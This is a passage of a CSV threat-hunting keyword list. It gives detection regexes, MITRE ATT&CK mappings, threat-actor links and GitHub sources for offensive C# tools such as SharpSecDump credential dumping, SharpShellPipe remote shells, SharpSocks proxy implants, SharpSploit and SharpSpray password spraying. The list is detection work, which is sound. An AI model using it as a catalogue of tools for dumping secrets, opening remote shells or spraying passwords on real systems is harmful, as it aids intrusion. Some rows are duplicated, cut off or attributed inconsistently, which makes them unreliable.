Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*SharpSearch.exe*",".{0,1000}SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSecDump Info*",".{0,1000}SharpSecDump\sInfo.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*SharpSecDump.csproj*",".{0,1000}SharpSecDump\.csproj.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*SharpSecDump.exe*",".{0,1000}SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSecDump.exe*",".{0,1000}SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*SharpSecDump.sln*",".{0,1000}SharpSecDump\.sln.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*SharpSecDump-master*",".{0,1000}SharpSecDump\-master.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","N/A","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","10","6","558","73","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z" "*sharpsecretsdump*",".{0,1000}sharpsecretsdump.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*SharpShares.csproj*",".{0,1000}SharpShares\.csproj.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*SharpShares.exe*",".{0,1000}SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpShares.exe*",".{0,1000}SharpShares\.exe.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*SharpShares.sln*",".{0,1000}SharpShares\.sln.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*SharpShellPipe.exe*",".{0,1000}SharpShellPipe\.exe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*SharpShellPipe.sln*",".{0,1000}SharpShellPipe\.sln.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*SharpShellPipe-main*",".{0,1000}SharpShellPipe\-main.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*SharpShooter*",".{0,1000}SharpShooter.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1564 - T1204 - T1059 - T1105","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","1743","343","2024-03-20T12:57:51Z","2018-03-06T20:04:20Z" "*SharpShot.exe /*",".{0,1000}SharpShot\.exe\s\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Sharp-SMBExec.exe*",".{0,1000}Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSniper.exe*",".{0,1000}SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSocks.exe*",".{0,1000}SharpSocks\.exe.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.pfx*",".{0,1000}SharpSocks\.pfx.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.resx*",".{0,1000}SharpSocks\.resx.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.sln*",".{0,1000}SharpSocks\.sln.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksCommon*",".{0,1000}SharpSocksCommon.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksConfig*",".{0,1000}SharpSocksConfig.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksImplant*",".{0,1000}SharpSocksImplant.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksServer*",".{0,1000}SharpSocksServer.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","470","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSpawner.cs*",".{0,1000}SharpSpawner\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpSphere.exe*",".{0,1000}SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSploit Command Execution*",".{0,1000}SharpSploit\sCommand\sExecution.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Credentials Commands*",".{0,1000}SharpSploit\sCredentials\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Domain Enumeration Commands*",".{0,1000}SharpSploit\sDomain\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Enumeration Commands*",".{0,1000}SharpSploit\sEnumeration\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Lateral Movement Commands*",".{0,1000}SharpSploit\sLateral\sMovement\sCommands.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit Service*",".{0,1000}SharpSploit\sService.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit*",".{0,1000}SharpSploit.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.dll*",".{0,1000}SharpSploit\.dll.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.Enumeration.*",".{0,1000}SharpSploit\.Enumeration\..{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploit.Exe*",".{0,1000}SharpSploit\.Exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.Execution.*",".{0,1000}SharpSploit\.Execution\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.Persistence.*",".{0,1000}SharpSploit\.Persistence\..{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*sharpSploitConsole.exe*",".{0,1000}sharpSploitConsole\.exe.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploitConsole.sln*",".{0,1000}SharpSploitConsole\.sln.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploitConsole:>*",".{0,1000}SharpSploitConsole\:\>.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploitConsole_x*",".{0,1000}SharpSploitConsole_x.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","276","60","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpSploitConsole-master*",".{0,1000}SharpSploitConsole\-master.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*SharpSploitDomainRecon*",".{0,1000}SharpSploitDomainRecon.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpSploitDomainReconImpl*",".{0,1000}SharpSploitDomainReconImpl.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpSploitService.exe*",".{0,1000}SharpSploitService\.exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploitSvc*",".{0,1000}SharpSploitSvc.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSplunkWhisperer2*",".{0,1000}SharpSplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*SharpSpoolTrigger.exe*",".{0,1000}SharpSpoolTrigger\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSpray*",".{0,1000}SharpSpray.{0,1000}","offensive_tool_keyword","SharpSpray","This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.","T1110 - T1558","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/jnqpblc/SharpSpray","1","1","N/A","N/A","2","186","36","2019-06-30T03:10:52Z","2019-03-04T17:14:07Z" "*SharpSpray.exe *",".{0,1000}SharpSpray\.exe\s.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpSpray.exe*",".{0,1000}SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpSpray\Program.cs*",".{0,1000}SharpSpray\\Program\.cs.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" 